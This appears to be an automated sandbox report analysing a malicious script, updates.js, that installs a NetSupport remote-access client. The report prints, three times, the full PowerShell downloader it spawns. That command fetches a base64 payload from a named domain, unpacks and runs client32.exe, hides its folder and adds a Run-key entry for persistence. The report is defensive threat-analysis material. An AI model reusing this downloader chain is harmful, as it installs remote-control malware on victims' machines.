                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $uetamvcs='http://luxurycaborental.com/cdn-vs/data.php?12105';$xajcg=(new-object system.net.webclient).downloadstring($uetamvcs);$otzwz=[system.convert]::frombase64string($xajcg);$asd = get-random -minimum -10 -maximum 37; $zplwc=[system.environment]::getfolderpath('applicationdata')+'\qchbwpb'+$asd;if (!(test-path $zplwc -pathtype container)) { new-item -path $zplwc -itemtype directory };$p=join-path $zplwc 'tttt.zip';[system.io.file]::writeallbytes($p,$otzwz);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$zplwc)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $zplwc 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $zplwc -force; $fd.attributes='hidden';$s=$zplwc+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='btgeeena';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $uetamvcs='http://luxurycaborental.com/cdn-vs/data.php?12105';$xajcg=(new-object system.net.webclient).downloadstring($uetamvcs);$otzwz=[system.convert]::frombase64string($xajcg);$asd = get-random -minimum -10 -maximum 37; $zplwc=[system.environment]::getfolderpath('applicationdata')+'\qchbwpb'+$asd;if (!(test-path $zplwc -pathtype container)) { new-item -path $zplwc -itemtype directory };$p=join-path $zplwc 'tttt.zip';[system.io.file]::writeallbytes($p,$otzwz);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$zplwc)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $zplwc 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $zplwc -force; $fd.attributes='hidden';$s=$zplwc+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='btgeeena';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
                                Source: client32.exeBinary or memory string: Shell_TrayWnd
                                Source: client32.exeBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoA,4_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11174796
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6EF21EB8
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6EF21E5D
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6EF20F39
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6EF21CC1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoA,4_2_6EF2DC99
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6EF2DC56
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6EF21DB6
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_6EF1FAE1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_6EF2DB7C
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoA,6_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11174796
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11174898
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,4_2_11134830
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,4_2_11147160
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,4_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,4_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070430
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EEFA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,4_2_6EEFA980
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_11070430
                                Source: Yara matchFile source: 4.2.client32.exe.74ad0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.74ad0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.74ad0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.powershell.exe.14e8c688a28.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.6f060000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6f060000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.6f060000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.client32.exe.f70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.powershell.exe.14e8c667f38.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.powershell.exe.14e8c67e7d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.6eef0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.3402960435.0000000003482000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2327778463.0000000001168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2273711249.0000014E8C67C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2406926738.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.2405095059.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2406580493.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2324165734.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2273711249.0000014E8C686000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2328346268.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2327730095.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2273711249.0000014E8C37F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2273711249.0000014E8C7AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2273711249.0000014E8C65D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.2231581976.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information12
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		12
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		11
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS34
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		13
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets251
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media3
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync31
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1475034 Sample: updates.js Startdate: 17/07/2024 Architecture: WINDOWS Score: 100 34 luxurycaborental.com 2->34 36 geo.netsupportsoftware.com 2->36 48 Snort IDS alert for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 6 other signatures 2->54 8 wscript.exe 1 1 2->8         started        11 client32.exe 2->11         started        13 client32.exe 2->13         started        signatures3 process4 signatures5 64 Suspicious powershell command line found 8->64 66 Wscript starts Powershell (via cmd or directly) 8->66 68 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->68 70 Suspicious execution chain found 8->70 15 powershell.exe 15 42 8->15         started        process6 dnsIp7 42 luxurycaborental.com 38.180.60.246, 49704, 80 COGENT-174US United States 15->42 26 C:\Users\user\AppData\...\remcmdstub.exe, PE32 15->26 dropped 28 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 15->28 dropped 30 C:\Users\user\AppData\...\client32.exe, PE32 15->30 dropped 32 6 other files (5 malicious) 15->32 dropped 44 Found suspicious powershell code related to unpacking or dynamic code loading 15->44 46 Powershell drops PE file 15->46 20 client32.exe 17 15->20         started        24 conhost.exe 15->24         started        file8 signatures9 process10 dnsIp11 38 194.180.191.69, 443, 49705 MIVOCLOUDMD unknown 20->38 40 geo.netsupportsoftware.com 104.26.0.231, 49706, 80 CLOUDFLARENETUS United States 20->40 56 Multi AV Scanner detection for dropped file 20->56 58 Contains functionalty to change the wallpaper 20->58 60 Delayed program exit found 20->60 62 Contains functionality to detect sleep reduction / modifications 20->62 signatures12

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                No Antivirus matches

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe26%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                                https://github.com/apache/incubator-echarts/issues/113690%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe
                                https://jsperf.com/try-catch-performance-overhead0%Avira URL Cloudsafe
